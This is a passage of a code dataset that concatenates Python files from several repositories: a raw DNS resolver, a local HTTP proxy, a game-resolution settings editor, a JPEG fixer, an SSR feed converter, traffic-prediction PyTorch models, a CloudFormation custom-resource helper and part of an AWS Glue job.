policy = asyncio.WindowsSelectorEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
CheckerBus().start()
if __name__ == '__main__':
main()
```
#### File: 1ocalhost/py_cheat/dns_lookup.py
```python
import socket
import ipaddress
def parse_dns_string(reader, data):
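    # Decode a DNS-encoded name: each label is a length byte followed by that many
    # characters, a 0x00 byte ends the name, and a byte with the top two bits set
    # (0b11xxxxxx) starts a 2-byte compression pointer resolved via reader.reuse().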
res = ''
to_resue = None
bytes_left = 0
for ch in data:
if not ch:
break
if to_resue is not None:
resue_pos = chr(to_resue) + chr(ch)
res += reader.reuse(resue_pos)
break
if bytes_left:
res += chr(ch)
bytes_left -= 1
continue
if (ch >> 6) == 0b11 and reader is not None:
to_resue = ch - 0b11000000
else:
bytes_left = ch
if res:
res += '.'
return res
class StreamReader:
def __init__(self, data):
self.data = data
self.pos = 0
def read(self, len_):
pos = self.pos
if pos >= len(self.data):
            raise IndexError('attempted to read past the end of the DNS response')
res = self.data[pos: pos+len_]
self.pos += len_
return res
def reuse(self, pos):
pos = int.from_bytes(pos.encode(), 'big')
return parse_dns_string(None, self.data[pos:])
def make_dns_query_domain(domain):
def f(s):
return chr(len(s)) + s
parts = domain.split('.')
parts = list(map(f, parts))
return ''.join(parts).encode()
def make_dns_request_data(dns_query):
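    # Fixed 12-byte DNS header: ID=0xaabb, flags=0x0100 (recursion desired),
    # QDCOUNT=1, AN/NS/ARCOUNT=0; the trailing bytes are the 0x00 that terminates
    # the QNAME, then QTYPE=A (1) and QCLASS=IN (1).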
req = b'\xaa\xbb\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00'
req += dns_query
req += b'\x00\x00\x01\x00\x01'
return req
def add_record_to_result(result, type_, data, reader):
if type_ == 'A':
item = str(ipaddress.IPv4Address(data))
elif type_ == 'CNAME':
item = parse_dns_string(reader, data)
else:
return
result.setdefault(type_, []).append(item)
def parse_dns_response(res, dq_len, req):
reader = StreamReader(res)
def get_query(s):
return s[12:12+dq_len]
data = reader.read(len(req))
assert(get_query(data) == get_query(req))
def to_int(bytes_):
return int.from_bytes(bytes_, 'big')
result = {}
res_num = to_int(data[6:8])
for i in range(res_num):
reader.read(2)
type_num = to_int(reader.read(2))
type_ = None
if type_num == 1:
type_ = 'A'
elif type_num == 5:
type_ = 'CNAME'
reader.read(6)
data = reader.read(2)
data = reader.read(to_int(data))
add_record_to_result(result, type_, data, reader)
return result
def dns_lookup(domain, address):
dns_query = make_dns_query_domain(domain)
dq_len = len(dns_query)
req = make_dns_request_data(dns_query)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(2)
try:
sock.sendto(req, (address, 53))
res, _ = sock.recvfrom(1024 * 4)
result = parse_dns_response(res, dq_len, req)
except Exception:
return
finally:
sock.close()
return result
if __name__ == '__main__':
print(dns_lookup('www.stackoverflow.com', "8.8.8.8"))
```
#### File: 1ocalhost/py_cheat/http_proxy.py
```python
import re
import asyncio
all_clients = {}
re_http_forward_proxy = re.compile(
r'^http://([^:/]+)(?::([^/]*))?/(.*)')
async def read_http_header(reader):
header = b''
while True:
line = await reader.readline()
if not line:
return
header += line
if line == b'\r\n':
break
return header
def remore_useless_header(header):
def not_proxy_keep_alive(x):
return not x.lower().startswith('proxy-connection:')
return list(filter(not_proxy_keep_alive, header))
async def get_request_info_from_header(reader):
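    # Two proxying modes are handled here:
    #  - CONNECT <host>:<port>            -> tunnel mode: raw bytes are relayed (used for HTTPS)
    #  - <METHOD> http://host[:port]/path -> forward-proxy mode: the absolute URI is
    #    rewritten to an origin-form request line before being sent upstream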
header = await read_http_header(reader)
if not header:
        raise ValueError('connection closed before a complete HTTP header was received')
header_items = header.decode().split('\r\n')
method_args = header_items[0].split(' ')
method = method_args[0]
uri = method_args[1]
tunnel_mode = (method == 'CONNECT')
print(method, uri)
if tunnel_mode:
remote_host = uri.split(':')
host = remote_host[0]
port = int(remote_host[1])
else:
m = re_http_forward_proxy.match(uri)
if not m:
            raise ValueError('unsupported request URI for forward proxying')
host = m.group(1)
port_str = m.group(2)
port = int(port_str) if port_str else 80
method_args[1] = '/' + m.group(3)
header_items[0] = ' '.join(method_args)
header_items = remore_useless_header(header_items)
new_header = '\r\n'.join(header_items).encode()
return new_header, tunnel_mode, (host, port)
async def relay_stream(read1, write1, read2, write2):
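    # Pump bytes in both directions until either side closes, so client and
    # upstream server see a transparent byte stream.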
async def relay(reader, writer):
while True:
line = await reader.read(1024)
if len(line) == 0:
break
writer.write(line)
await writer.drain()
await asyncio.wait([
relay(read1, write2),
relay(read2, write1)
])
async def server_handler_impl(reader, writer):
try:
header, tunnel_mode, remote_host = \
await get_request_info_from_header(reader)
peer_reader, peer_writer = \
await asyncio.open_connection(*remote_host)
except Exception:
return
try:
if tunnel_mode:
writer.write(b'HTTP/1.1 200 Connection established\r\n\r\n')
await writer.drain()
else:
peer_writer.write(header)
await peer_writer.drain()
await relay_stream(reader, writer, peer_reader, peer_writer)
finally:
peer_writer.close()
async def server_handler(reader, writer):
routine = server_handler_impl(reader, writer)
task = asyncio.ensure_future(routine)
all_clients[task] = (reader, writer)
def client_done(task):
del all_clients[task]
writer.close()
task.add_done_callback(client_done)
async def server_loop(host, port):
def exception_handler(loop, context):
if 'exception' in context:
exception = context['exception']
if isinstance(exception, OSError):
return
loop = asyncio.get_event_loop()
loop.set_exception_handler(exception_handler)
server = await asyncio.start_server(server_handler, host, port)
await server.serve_forever()
if __name__ == '__main__':
asyncio.run(server_loop('127.0.0.1', 9000))
```
#### File: 1ocalhost/py_cheat/pubg_resolution_modifier.pyw
```python
import os
import re
import ctypes
from pathlib import Path
# Q: Why not using configparser module?
# A: Emmm, it raised "configparser.DuplicateOptionError".
CONF_PATH = \
R'%localappdata%\TslGame\Saved\Config\WindowsNoEditor' \
R'\GameUserSettings.ini'
WIDTH, HEIGHT = 1920, 1080
def msgbox(text, title=''):
func = ctypes.windll.user32.MessageBoxW
func(None, text, title, 0)
def change_resolution_size(conf, width, height):
new_conf = re.sub(
r'(\nResolutionSizeX=)(\d+)', r'\g<1>' + str(width), conf)
new_conf = re.sub(
r'(\nResolutionSizeY=)(\d+)', r'\g<1>' + str(height), new_conf)
return new_conf
def modify_conf(conf_file, width, height):
with open(conf_file, 'rb') as f:
conf = f.read(1024 * 1024).decode()
with open(conf_file, 'wb') as f:
new_conf = change_resolution_size(conf, width, height)
f.write(new_conf.encode())
def main():
conf_path = Path(os.path.expandvars(CONF_PATH))
width, height = WIDTH, HEIGHT
modify_conf(conf_path, width, height)
msgbox(f'OK, changed to: {width}x{height}', conf_path.name)
if __name__ == "__main__":
main()
```
#### File: 1ocalhost/py_cheat/repair_imperfect_jpeg.py
```python
import os
import sys
from pathlib import Path
from PIL import Image
TAB1 = ' ' * 2
TAB2 = ' ' * 4
IMPERFECT_JPEG_HEAD = bytes.fromhex(
'FF D8 FF EE 00 0E 41 64 6F 62 65 00 64 00')
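# These bytes are the JPEG SOI marker (FF D8) followed by an Adobe APP14 segment
# (FF EE, length 0x000E, "Adobe") -- the signature of Adobe/CMYK-flavoured JPEGs that
# many viewers render with wrong colours; such files are re-saved as plain RGB JPEGs below.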
def convert_image_file(file_path):
print(f'{TAB2} Opening... ', end='\r')
origin = Image.open(file_path)
print(f'{TAB2} Converting...', end='\r')
img_copy = origin.convert('RGB')
print(f'{TAB2} Saving... ', end='\r')
img_copy.save(file_path)
print(f'{TAB2} Converted. ')
def is_imperfect_jpeg(path):
if not path.endswith('.JPEG'):
return False
try:
with open(path, 'rb') as f:
data = f.read(len(IMPERFECT_JPEG_HEAD))
return data == IMPERFECT_JPEG_HEAD
except Exception as e:
print(f'{TAB2} ERROR: {e}')
return False
def convert_file_list(items):
converted_num = 0
for file_ in items:
print(f'{TAB1} Checking "{file_}"...')
if os.path.isdir(file_):
print(f'{TAB2} Skiped (folder).')
continue
if is_imperfect_jpeg(file_):
convert_image_file(file_)
converted_num += 1
else:
print(f'{TAB2} Skiped (not imperfect).')
return converted_num
def convert_file(file):
return 1, convert_file_list([file])
def convert_folder(folder):
children = os.listdir(folder)
def join_path(file):
return str(Path(folder) / file)
children = list(map(join_path, children))
return len(children), convert_file_list(children)
def convert_from_input(input_items):
total_num = 0
converted_num = 0
for item in input_items:
print(f'On {item}:')
if os.path.isfile(item):
result = convert_file(item)
total_num += result[0]
converted_num += result[1]
elif os.path.isdir(item):
result = convert_folder(item)
total_num += result[0]
converted_num += result[1]
else:
print(f'{TAB1} Skiped (not file nor folder).')
print('\n')
print('All complete!')
return total_num, converted_num
def main():
if len(sys.argv) <= 1:
print('Please drag files or folders into the icon of this program.')
else:
total, converted = convert_from_input(sys.argv[1:])
msg = f'{converted} of {total} file(s) have been converted!'
print(msg)
input()
main()
```
#### File: 1ocalhost/py_cheat/ssr_feed_cvt.py
```python
import base64
import re
import time
import datetime
import socket
import functools
import requests
import urllib.parse as uparse
import copy
def my_b64_decode(data):
d = data.replace('_', '/').replace('-', '+')
return base64.b64decode(d.strip() + '==').decode("utf-8")
def my_b64_url_encode(s):
return base64.urlsafe_b64encode(s.encode('utf-8')).decode('utf-8')
def b64_encode_param(s):
return my_b64_url_encode(s).replace('=', '')
def my_split_no_empty(obj, sep):
return list(filter(len, obj.split(sep)))
def parse_proxy_item(uri):
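    # An ssr:// link wraps a base64 payload split by '/': the part before it holds the
    # colon-separated server fields (host first, then port and the remaining SSR fields),
    # and the part after '/?' holds the query-string options (remarks, group, ...).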
ssr_scheme = 'ssr://'
uri_b64 = my_split_no_empty(uri, ssr_scheme)[0]
conf = re.split('/', my_b64_decode(uri_b64))
ss_conf = conf[0]
ssr_conf = conf[1]
ss_part = ss_conf.split(':', 1)
ssr_part = uparse.parse_qsl(uparse.urlsplit(ssr_conf).query)
return ss_part, dict(ssr_part)
class ProxyItemParser:
def __init__(self):
self.server = ''
self.server_ip = ''
def replace_server(self, host):
self.server = host
try:
ip = socket.gethostbyname(host)
self.server_ip = ip
return ip
except socket.gaierror:
            return host  # fall back to the hostname if DNS resolution fails
def replace_remark(self):
def replace():
if not self.server_ip:
return self.server + '(DNS)'
url = 'https://freeapi.ipip.net/' + self.server_ip
print(url)
try:
r = requests.get(url)
time.sleep(0.5)
except requests.exceptions.RequestException:
return self.server_ip + '(GET)'
if r.status_code != 200:
return self.server_ip + '(API)'
j = r.json()
item = j[0]
if j[1] and j[1] != j[0]:
item += ','
item += j[1]
if j[4]:
item += ','
item += j[4].split('/')[0]
return item
return b64_encode_param(replace())
def item_conv_impl(group, item):
parser = ProxyItemParser()
server_host = parser.replace_server(item[0][0])
item[1]['remarks'] = parser.replace_remark()
item[1]['group'] = group
return [server_host + ':' + item[0][1], item[1]]
def parse_feed_item(feed, group_name):
all_lines = my_split_no_empty(my_b64_decode(feed), '\n')
proxy_items = list(map(parse_proxy_item, all_lines))
proxy_items = {a[0]: (a, b) for a, b in proxy_items[2:]}
proxy_items = [v for k, v in proxy_items.items()]
group = b64_encode_param(group_name)
item_conv = functools.partial(item_conv_impl, group)
return list(map(item_conv, proxy_items))
def encode_feed_item(items, info):
def encode_proxy_item(item):
raw_data = item[0] + '/?' + uparse.urlencode(item[1])
return 'ssr://' + my_b64_url_encode(raw_data)
items.sort(key=lambda x: x[1]['remarks'])
items = list(map(encode_proxy_item, info + items))
new_feed_raw = '\n'.join(items)
return my_b64_url_encode(new_feed_raw)
def convert_feed(url, group_name):
try:
r = requests.get(url)
except requests.exceptions.RequestException:
print('Failed to connect to server')
return None
if r.status_code != 200:
print('Invalid status code')
return None
items = parse_feed_item(r.text, group_name)
info_time = copy.deepcopy(items[0])
now = re.sub(r'\.\d+', '', f'{datetime.datetime.now()}')
info_time[1]['remarks'] = b64_encode_param('Update: ' + now)
info_time[0] = re.sub('^[^:]+', 'google.com', info_time[0])
return encode_feed_item(items, [info_time])
# Usage:
# convert_feed('https://example.com/feed.txt', 'GroupName')
``` |
{
"source": "1ofsomepeople/flask-learn",
"score": 3
} |
#### File: 1ofsomepeople/flask-learn/png2json.py
```python
import os
import sys
import lnglat_mercator_tiles_convertor as convertor
import json
def readpoints():
pointsFile = './points.json'
data = []
tilePoint = {}
with open(pointsFile, 'r') as f:
data = json.load(f).get('wgs84points')
# print('readpoints'+ str(len(data)))
for point in data:
# point[0] = round(point[0],6)
# point[1] = round(point[1],6)
lng_BD09,lat_BD09 = convertor.wgs84_to_bd09(point[0], point[1])
pointX,pointY = convertor.BD092mercotor(lng_BD09,lat_BD09)
tileX,tileY,pixelX,pixelY = convertor.point2tiles_pixel(pointX,pointY,14)
tileName = str(tileX)+str(tileY)
if(tileName in tilePoint.keys()):
tilePoint[tileName].append([pixelX,pixelY,point[0],point[1]])
else:
tilePoint[tileName] = []
tilePoint[tileName].append([pixelX,pixelY,point[0],point[1]])
return tilePoint
def rgb2hsv(rgb):
r, g, b = rgb[0], rgb[1], rgb[2]
m_x = max(r, g, b)
m_n = min(r, g, b)
m = m_x - m_n
if m_x == m_n:
h = 0
elif m_x == r:
if g >= b:
h = ((g - b) / m) * 60
else:
h = ((g - b) / m) * 60 + 360
elif m_x == g:
h = ((b - r) / m) * 60 + 120
elif m_x == b:
h = ((r - g) / m) * 60 + 240
if m_x == 0:
s = 0
else:
s = m / m_x
v = m_x
H = h / 2
S = s * 255.0
V = v * 255.0
return int(round(H)), int(round(S)), int(round(V))
def hsv2value(hsv):
h, s, v = hsv[0], hsv[1], hsv[2]
if 35 <= h <= 99 and 43 <= s <= 255 and 46 <= v <= 255: # green
return 3
elif 0 <= h <= 10 and 43 <= s <= 255 and 46 <= v <= 255: # red
return 10
elif 11 <= h <= 34 and 43 <= s <= 255 and 46 <= v <= 255: # yellow
return 7
elif 0 <= s <= 43 and 46 <= v <= 255: # white and gray
return 1
else: # black
return 0
# Map an RGB color to a value (grayscale-like). In traffic data, red/green/blue stand for different states, so their weights should differ
def RGB2Value(R,G,B):
    # Weighted-average grayscale: Gray = 0.299*R + 0.578*G + 0.114*B
# weight = [0.600,0.100,0.300]
# value = weight[0]*R + weight[1]*G + weight[2]*B
# value = round(R,6)
H,S,V = rgb2hsv([R,G,B])
value = hsv2value([H,S,V])
return value
```
#### File: flask-learn/pred_model/lr_online_test.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
# from transform_dataset import TrafficData
import random
import numpy as np
import pandas as pd
import os
class OneHotProcess(nn.Module):
def __init__(self, in_dim, hid_c):
super(OneHotProcess, self).__init__()
# print(in_dim, hid_c) # 3 12
self.embedding = nn.Embedding(in_dim, hid_c)
def forward(self, source):
source = source // 20 - 1
# print("source",source)
source = self.embedding(source)
# print("source after embeding",source)
return source
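# Illustrative note (assuming states are encoded as 20/40/60 as elsewhere in this
# repo): `source // 20 - 1` maps 20 -> 0, 40 -> 1, 60 -> 2 before the embedding
# lookup, e.g.
#   emb = OneHotProcess(in_dim=3, hid_c=12)
#   emb(torch.LongTensor([[20, 40, 60]])).size()  # -> torch.Size([1, 3, 12])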
class LinearRegression(nn.Module):
def __init__(self, in_dim, hid_c, src_len):
# in_dim, hid_c, src_len 3,12,12
super(LinearRegression, self).__init__()
self.oneHotEmbed = OneHotProcess(in_dim, hid_c)
self.linear = nn.Linear(src_len * hid_c, in_dim)
def forward(self, input_data, device):
source = input_data.to(device) # [B, N, src_len]
input_feature = self.oneHotEmbed(source) # [B, N, src_len, hid_dim]
# print("input_feature",input_feature)
B, N, src_len, hid_c = input_feature.size() # 1 17531 12 12
input_feature = input_feature.view(B, N, -1) # [B, N, src_len * hid_dim]
out_feature = F.relu(self.linear(input_feature)) # [B, N, in_dim]
predict = F.softmax(out_feature, dim=-1)
return predict # [B, N, in_dim]
def test(test_data):
"""
test_data: [B, N, src_len] 20, 40, 60
prediction: [B, N, in_dim]
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
file_name = "lr.pkl"
    path = os.path.abspath('.')  # absolute path of the current execution environment
if(os.path.split(path)[-1] == 'pred_model'):
file_name = os.path.join(path,'lr.pkl')
elif(os.path.split(path)[-1] == 'flask-learn'):
file_name = os.path.join(path,'pred_model','lr.pkl')
checkpoint = torch.load(file_name, device)
model_para = checkpoint["model"]
option = checkpoint["setting"]
cudnn.benchmark = True
# print("option.hid_c:", option.hid_c) # 12
# print("option.h_step:", option.h_step) # 12
model = LinearRegression(3, option.hid_c, option.h_step) # 3,12,12
model.load_state_dict(model_para)
model = model.to(device)
    # count the number of model parameters
total = sum([param.nelement() for param in model.parameters()])
print("Number of parameter: %.2f" % (total)) # Number of parameter: 471.00
prediction = model(test_data, device)
return prediction
# if __name__ == '__main__':
# test_set = TrafficData(folder="data", train_ratio=0.6, valid_ratio=0.2, data_type="test", h_step=12, f_step=1)
# test_data = torch.cat((test_set[0]["x"].unsqueeze(0), test_set[1]["x"].unsqueeze(0)), dim=0)
# prediction = test(test_data)
# print(prediction.size())
def mockData():
    # build a 17531 x 12 2-D array
timeData = [[random.randrange(20,61,20) for col in range(12)] for row in range(17531)]
    # Expand the tensor dimensions: unsqueeze(0) adds a size-one dimension at position 0, e.g. data of shape (3) becomes (1, 3)
tensorData = torch.Tensor(timeData).unsqueeze(0).long()
# print(tensorData.size()) # torch.Size([1, 17531, 12])
# print(tensorData.type()) # torch.LongTensor
return tensorData
# load the data used for model prediction
def loadDataForPred():
    # read the csv into a DataFrame
readCsv = pd.read_csv('../data.csv')
    # array of point indices (lng/lat points)
pointsIndex = np.array(readCsv.values)[:,0].tolist()
dataForPred = np.array(readCsv.values)[:,-12:].tolist()
tensorData = torch.Tensor(dataForPred).unsqueeze(0).long()
print(tensorData.size())
print(tensorData.type())
return tensorData
if __name__ == '__main__':
# tensorData = loadDataForPred()
tensorData = mockData()
prediction = test(tensorData)
# print("prediction.size():",prediction.size())
# resultIndexList = torch.max(prediction[0],1)[1].numpy().tolist()
# for i in range(len(resultIndexList)):
# resultIndexList[i] = 20 + resultIndexList[i]*20
# print("resultIndexList",resultIndexList)
```
#### File: pred_model/sourceCode/model.py
```python
import dgl
import torch
import torch.nn as nn
import torch.nn.functional as F
from graph import GraphModel, SGModel, SAGEModel
class OneHotProcess(nn.Module):
def __init__(self, in_dim, hid_c):
super(OneHotProcess, self).__init__()
self.embedding = nn.Embedding(in_dim, hid_c)
def forward(self, source, target):
source = source // 20 - 1
target = target // 20 - 1
source = self.embedding(source)
return source, target
class PredictModel(nn.Module):
def __init__(self, keyword, src_id, dst_id, in_dim, hid_c, src_len, n_layers, device):
super(PredictModel, self).__init__()
self.oneHotEmbed = OneHotProcess(in_dim, hid_c)
if keyword == "Graph":
self.model = GraphModel(src_id, dst_id, src_len * hid_c, src_len * hid_c, device)
elif keyword == "SG":
self.model = SGModel(src_id, dst_id, src_len * hid_c, src_len * hid_c, n_layers, device)
elif keyword == "SAGE":
self.model = SAGEModel(src_id, dst_id, src_len * hid_c, src_len * hid_c, n_layers, device)
else:
raise KeyError("Keyword is not defined! ")
self.linear = nn.Linear(src_len * hid_c, in_dim)
def forward(self, input_data, device, **kwargs):
source = input_data["x"].to(device) # [B, N, src_len]
target = input_data["y"].to(device)[:, :, 0] # [B, N]
# target = input_data["y"].to(device) # [B, N]
input_feature, target = self.oneHotEmbed(source, target)
B, N, src_len, hid_c = input_feature.size()
input_feature = input_feature.view(B, N, -1).permute(1, 0, 2) # [N, B, src_len * hid_c]
output_feature = self.model(input_feature) # [N, B, hid_c]
output_feature = self.linear(output_feature) # [N, B, in_dim]
predict = F.softmax(output_feature, dim=-1).permute(1, 0, 2) # [B, N, in_dim]
predict = predict.reshape(B * N, -1)
target = target.reshape(-1)
return predict, target
class LinearRegression(nn.Module):
def __init__(self, in_dim, hid_c, src_len):
super(LinearRegression, self).__init__()
self.oneHotEmbed = OneHotProcess(in_dim, hid_c)
self.linear = nn.Linear(src_len * hid_c, in_dim)
def forward(self, input_data, device, **kwargs):
source = input_data["x"].to(device) # [B, N, src_len]
target = input_data["y"].to(device)[:, :, 0] # [B, N]
input_feature, target = self.oneHotEmbed(source, target) # [B, N, src_len, hid_dim]
B, N, src_len, hid_c = input_feature.size()
input_feature = input_feature.view(B, N, -1) # [B, N, src_len * hid_dim]
out_feature = F.relu(self.linear(input_feature)) # [B, N, in_dim]
predict = F.softmax(out_feature, dim=-1)
predict = predict.reshape(B * N, -1)
target = target.reshape(-1)
return predict, target
class NormalizeLR(nn.Module):
def __init__(self, in_dim, hid_c, src_len):
super(NormalizeLR, self).__init__()
self.oneHotEmbed = OneHotProcess(in_dim, hid_c)
self.linear = nn.Linear(src_len * hid_c, in_dim)
self.norm = nn.BatchNorm1d(in_dim)
def forward(self, input_data, device, **kwargs):
source = input_data["x"].to(device) # [B, N, src_len]
target = input_data["y"].to(device)[:, :, 0] # [B, N]
input_feature, target = self.oneHotEmbed(source, target) # [B, N, src_len, hid_dim]
B, N, src_len, hid_c = input_feature.size()
input_feature = input_feature.view(B, N, -1) # [B, N, src_len * hid_dim]
out_feature = self.norm(self.linear(input_feature).permute(0, 2, 1)) # [B, N, in_dim]
out_feature = F.relu(out_feature.permute(0, 1, 2))
predict = F.softmax(out_feature, dim=-1)
predict = predict.reshape(B * N, -1)
target = target.reshape(-1)
return predict, target
if __name__ == '__main__':
input_data = {"x": torch.LongTensor([[20, 40, 60, 20, 20, 40],
[20, 40, 60, 20, 20, 40],
[20, 40, 60, 20, 20, 40]]).unsqueeze(0), # [1, 3, 6] B, N, T
"y": torch.LongTensor([[20, 40, 60, 20, 20, 40],
[20, 40, 60, 20, 20, 40],
[20, 40, 60, 20, 20, 40]]).unsqueeze(0)} # [1, 3, 6] B, N, T
# print(input_data)
model = PredictModel(keyword="SAGE",
src_id=[0, 1, 2], dst_id=[1, 2, 0],
in_dim=3, hid_c=12, src_len=6, n_layers=2, device=torch.device("cpu"))
result = model(input_data, torch.device("cpu"))
print(result[0].size())
print(result[1].size())
```
#### File: pred_model/sourceCode/sage_online_test.py
```python
import dgl
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import dgl.nn as gnn
# from transform_dataset import TrafficData
def load_graph():
graph_data = np.load("graph.npz")
src_id = graph_data["src_id"]
dst_id = graph_data["dst_id"]
return list(src_id), list(dst_id)
class OneHotProcess(nn.Module):
def __init__(self, in_dim, hid_c):
super(OneHotProcess, self).__init__()
self.embedding = nn.Embedding(in_dim, hid_c)
def forward(self, source):
source = source // 20 - 1
source = self.embedding(source)
return source
class SAGEModel(nn.Module):
def __init__(self, src_id, dst_id, in_c, hid_c, n_layers, device):
super(SAGEModel, self).__init__()
self.graph = dgl.graph((src_id, dst_id), device=device)
self.gcn = nn.ModuleList([gnn.SAGEConv(in_c if i == 0 else hid_c, hid_c, "pool") for i in range(n_layers)])
self.residual = nn.ModuleList([nn.Identity() if i != 0 else nn.Linear(in_c, hid_c) for i in range(n_layers)])
def forward(self, features):
input_features = features
for i, conv in enumerate(self.gcn):
output_features = F.relu(conv(self.graph, input_features)) + self.residual[i](input_features)
input_features = output_features
return input_features
class PredictModel(nn.Module):
def __init__(self, keyword, src_id, dst_id, in_dim, hid_c, src_len, n_layers, device):
super(PredictModel, self).__init__()
self.oneHotEmbed = OneHotProcess(in_dim, hid_c)
if keyword == "SAGE":
self.model = SAGEModel(src_id, dst_id, src_len * hid_c, src_len * hid_c, n_layers, device)
else:
raise KeyError("Keyword is not defined! ")
self.linear = nn.Linear(src_len * hid_c, in_dim)
def forward(self, input_data, device):
source = input_data.to(device) # [B, N, src_len]
input_feature = self.oneHotEmbed(source)
B, N, src_len, hid_c = input_feature.size()
input_feature = input_feature.view(B, N, -1).permute(1, 0, 2) # [N, B, src_len * hid_c]
output_feature = self.model(input_feature) # [N, B, hid_c]
output_feature = self.linear(output_feature) # [N, B, in_dim]
predict = F.softmax(output_feature, dim=-1).permute(1, 0, 2) # [B, N, in_dim]
return predict
def test(test_data):
"""
test_data: [B, N, src_len] 20, 40, 60
prediction: [B, N, in_dim]
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
file_name = "sage.pkl"
checkpoint = torch.load(file_name, map_location=device)
model_para = checkpoint["model"]
option = checkpoint["setting"]
cudnn.benchmark = True
src_id, dst_id = load_graph()
model = PredictModel(option.model, src_id, dst_id, 3, option.hid_c, option.h_step, option.n_layer, device)
model.load_state_dict(model_para)
model = model.to(device)
prediction = model(test_data, device)
return prediction
# if __name__ == '__main__':
# test_set = TrafficData(folder="data", train_ratio=0.6, valid_ratio=0.2, data_type="test", h_step=12, f_step=1)
# test_data = torch.cat((test_set[0]["x"].unsqueeze(0), test_set[1]["x"].unsqueeze(0)), dim=0)
# prediction = test(test_data)
# print(prediction.size())
``` |
{
"source": "1oglop1/aws-cloudformation-templates",
"score": 2
} |
#### File: custom_resources/python_custom_resource_helper/crhelper.py
```python
Create resource.\"""
physical_resource_id = context.log_stream_name
return physical_resource_id, {"Some": "Data"}
def update(event, context):
\"""Update resource.\"""
physical_resource_id = event['PhysicalResourceId']
return physical_resource_id, {}
def delete(event, context):
\"""Delete resource.\"""
return event['PhysicalResourceId']
def lambda_handler(event, context):
cfn_handler(event, context, create, update, delete)
"""
import json
import logging
import threading
from botocore.vendored import requests
LOGGER = logging.getLogger(__name__)
LOGGER.addHandler(logging.NullHandler())
SUCCESS = "SUCCESS"
FAILED = "FAILED"
def send_cfn(event, context, response_status, response_data, reason=None, physical_resource_id=None):
"""
Send a resource manipulation status response to CloudFormation
Modified from:
https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-lambda-function-code.html
"""
default_reason = (
f"See the details in CloudWatch Log group {context.log_group_name} "
f"Stream: {context.log_stream_name}"
)
response_body = json.dumps(
{
"Status": response_status,
"Reason": str(reason) + f".. {default_reason}" if reason else default_reason,
"PhysicalResourceId": physical_resource_id or context.log_stream_name,
"StackId": event["StackId"],
"RequestId": event["RequestId"],
"LogicalResourceId": event["LogicalResourceId"],
"Data": response_data,
}
)
LOGGER.info(f"ResponseURL: {event['ResponseURL']}", )
LOGGER.info(f"ResponseBody: {response_body}")
headers = {"Content-Type": "", "Content-Length": str(len(response_body))}
response = requests.put(event["ResponseURL"], data=response_body, headers=headers)
try:
response.raise_for_status()
LOGGER.info(f"Status code: {response.reason}")
except requests.HTTPError:
LOGGER.exception(f"Failed to send CFN response. {response.text}")
raise
def lambda_timeout(event, context):
"""Send error to CFN if Lambda runs ouf of time."""
msg = "Execution is about to time out, sending failure message"
LOGGER.error(msg)
send_cfn(event, context, FAILED, {}, reason=msg)
raise Exception(msg)
def cfn_handler(event, context, create, update, delete):
"""
Handle CFN events.
This function executes methods for custom resource creation and send response to CloudFormation API.
Parameters
----------
event
AWS Lambda event (request from CFN)
context
AWS Lambda context
create: function
Create(request) custom resource function.
update
Update custom resource function.
delete
Delete custom resource function.
"""
# Set timer to expire slightly sooner so we have time to notify CFN.
timeout_timer = threading.Timer(
(context.get_remaining_time_in_millis() / 1000.00) - 0.5,
lambda_timeout,
args=[event, context],
)
timeout_timer.start()
try:
# Execute custom resource handlers
LOGGER.info("Received a {} Request".format(event["RequestType"]))
if event["RequestType"] == "Create":
physical_resource_id, response_data = execute_handler(event, context, create)
elif event["RequestType"] == "Update":
physical_resource_id, response_data = execute_handler(event, context, update)
elif event["RequestType"] == "Delete":
delete(event, context)
physical_resource_id = event['PhysicalResourceId']
response_data = None
else:
msg = f"Unsupported RequestType: {event['RequestType']}"
send_cfn(event, context, FAILED, None, msg)
raise TypeError(msg)
send_cfn(event, context, SUCCESS, response_data, physical_resource_id=physical_resource_id)
# Safety switch - Catch any exceptions, log the stacktrace, send a failure back to
# CloudFormation and then raise an exception
except Exception as exc:
LOGGER.error(exc, exc_info=True)
send_cfn(
event,
context,
FAILED,
None,
reason=f"{exc.__class__.__name__}: {exc}",
)
raise
finally:
# Stop the before next lambda invocation.
timeout_timer.cancel()
def execute_handler(event, context, handler):
"""
Execute handlers: Create, Update and check their response.
Parameters
----------
event
AWS Lambda event.
context
AWS Lambda context.
handler: function
Functions Create or Update
Returns
-------
tuple
Verified response.
"""
response = handler(event, context)
if not isinstance(response, tuple) or len(response) != 2:
raise TypeError(f"Return type of {handler.__name__} must be tuple(PhysicalResourceId, Data).")
if not isinstance(response[0], str):
raise ValueError(f"PhysicalResourceId is not string, but {handler.__name__} returned {type(response[0])}.")
if not isinstance(response[1], dict) or response[1] is None:
raise TypeError(f"Data is not dictionary, but {handler.__name__} returned {type(response[1])}.")
return response
``` |
{
"source": "1oglop1/aws-glue-monorepo-style",
"score": 3
} |
#### File: ds1/raw_to_refined/raw_to_refined.py
```python
import logging
import pandas as pd
from glue_shared.pandas_helpers import write_parquet
LOGGER = logging.getLogger("job")
def main():
LOGGER.info("JOB_NAME: %s", JOB_CONFIG["JOB_NAME"])
LOGGER.info("JOB_ID: %s", JOB_CONFIG["JOB_ID"])
LOGGER.info("JOB_RUN_ID %s", JOB_CONFIG["JOB_RUN_ID"])
LOGGER.info("WORKFLOW_NAME: %s", JOB_CONFIG["WORKFLOW_NAME"])
LOGGER.info("WORKFLOW_RUN_ID %s", JOB_CONFIG["WORKFLOW_RUN_ID"])
data_src = f"s3://{JOB_CONFIG['S3_BUCKET']}/{JOB_CONFIG['s3_raw_prefix']}/cereal.csv"
LOGGER.info("Reading raw data from %s", data_src)
df = pd.read_csv(data_src, sep=";")
LOGGER.info("DF shape %s", df.shape)
write_parquet(df, f"s3://{JOB_CONFIG['S3_BUCKET']}/{JOB_CONFIG['s3_refined_prefix']}")
if __name__ == "__main__":
from config import JOB_CONFIG
main()
```
#### File: src/glue_shared/glue_interface.py
```python
import logging
from typing import List, Dict, Sequence, Iterable
LOGGER = logging.getLogger(__name__)
def get_glue_args(arguments: Sequence, options: List[str] = None) -> Dict:
"""
